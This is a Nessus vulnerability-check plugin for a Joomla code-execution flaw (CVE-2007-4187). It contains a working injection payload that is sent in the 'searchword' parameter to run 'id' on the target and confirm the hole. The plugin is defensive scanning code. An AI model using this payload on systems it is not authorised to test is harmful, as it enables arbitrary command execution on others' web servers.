#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows arbitrary
command execution. 

Description :

The version of Joomla on the remote host fails to sanitize input to
the 'searchword' parameter before passing it to an 'eval()' function
in 'components/com_search/views/search/tmpl/default_results.php'.  An
unauthenticated attacker can leverage this issue to execute arbitrary
PHP code on the remote host subject to the privileges of the web
server user id. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0447.html

Solution :

Upgrade to Joomla 1.5 RC1 or later as it is rumored to resolve the
issue. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25992);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2007-4187");
  script_bugtraq_id(24997);

  script_name(english:"Joomla searchword Command Execution Vulnerability");
  script_summary(english:"Tries to run a command via Joomla");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("joomla_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/joomla"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the issue to run a command.
  cmd = "id";
  req = http_get(
    item:string(
      dir, "/index.php?",
      "searchword=", urlencode(str:'";system(id);#'), "&",
      "option=com_search&",
      "Itemid=1"
    ),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
  if (line)
  {
    if ("Search for <b>" >< line) 
      line = strstr(line, "Search for <b>") - "Search for <b>";

    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Nessus was able to execute the command '", cmd, "' on the remote host,\n",
      "which produced the following output :\n",
      "\n",
      "  ", line
    );
    security_hole(port:port, data:report);
    exit(0);
  }
}
